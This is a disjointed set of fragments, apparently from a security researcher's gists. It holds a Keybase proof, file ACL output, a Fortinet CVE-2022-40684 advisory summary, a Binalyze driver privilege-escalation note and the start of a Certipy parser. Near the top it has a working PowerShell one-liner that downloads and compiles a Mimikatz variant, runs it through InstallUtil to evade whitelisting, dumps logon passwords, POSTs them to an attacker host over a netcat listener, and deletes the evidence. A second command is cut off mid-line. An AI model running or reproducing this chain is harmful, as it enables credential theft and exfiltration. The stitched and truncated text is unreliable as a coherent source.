I hereby claim:
- I am tylerdru1d on github.
- I am dru1d (https://keybase.io/dru1d) on keybase.
- I have a public key whose fingerprint is 16BE 864F AB13 1A3F BAB7 9D68 0A45 A12E 5B78 5293
To claim this, I am signing this object:
Credits: https://github.com/caseysmithrc and https://github.com/xillwillx
#On attacker machine:
#nc -lkvp 80 >> katz-listener.log
#SSL encrypted traffic
#ncat -lkvp 443 --ssl
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/dru1d-foofus/aa8c6894c2be84bb01b1ddeba492134e/raw/a8e703dcb7af9ea02309c71292931670c2ec63f7/katz.cs','katz.cs'); && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && c:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe privilege::debug sekurlsa::logonpasswords > katz.txt exit && powershell -ExecutionPolicy Bypass -noLogo -Command (Invoke-WebRequest -Uri http://ATTACKER-IP/$env:ComputerName -Method POST -InFile katz.txt -TimeoutSec 5); exit && del katz.* && exit
#SSL - encrypted traffic
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebCl
Path   : Microsoft.PowerShell.Core\FileSystem::C:\Program Files (x86)\Watchdog Anti-Virus\.sentry-native
Owner  : BUILTIN\Administrators
Group  : DESKTOP-8B89BFF\None
Access : BUILTIN\Users Allow Modify, Synchronize
         NT SERVICE\TrustedInstaller Allow FullControl
         NT SERVICE\TrustedInstaller Allow 268435456
         NT AUTHORITY\SYSTEM Allow FullControl
         NT AUTHORITY\SYSTEM Allow 268435456
         BUILTIN\Administrators Allow FullControl
         BUILTIN\Administrators Allow 268435456
Summary: An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Exploitation Status: Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: user="Local_Process_Access"
Source: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
A FortiOS 7.0.6 virtual appliance VM was acquired from the Fortinet portal. This was subsequently deployed into a lab environment where further testing would take place.
Mike Alfaro (@_mmpte_software) and Tyler Booth (@tyler_dru1d)
An issue in Binalyze IREC.sys v.3.11.0 and before allows a local attacker to execute arbitrary code and escalate privileges due to an improper DACL being applied to the device the driver creates.
Incorrect Access Control
#! /usr/bin/env python3
#######################
# Certipy JSON Parser #
# dru1d               #
#######################
import json
import argparse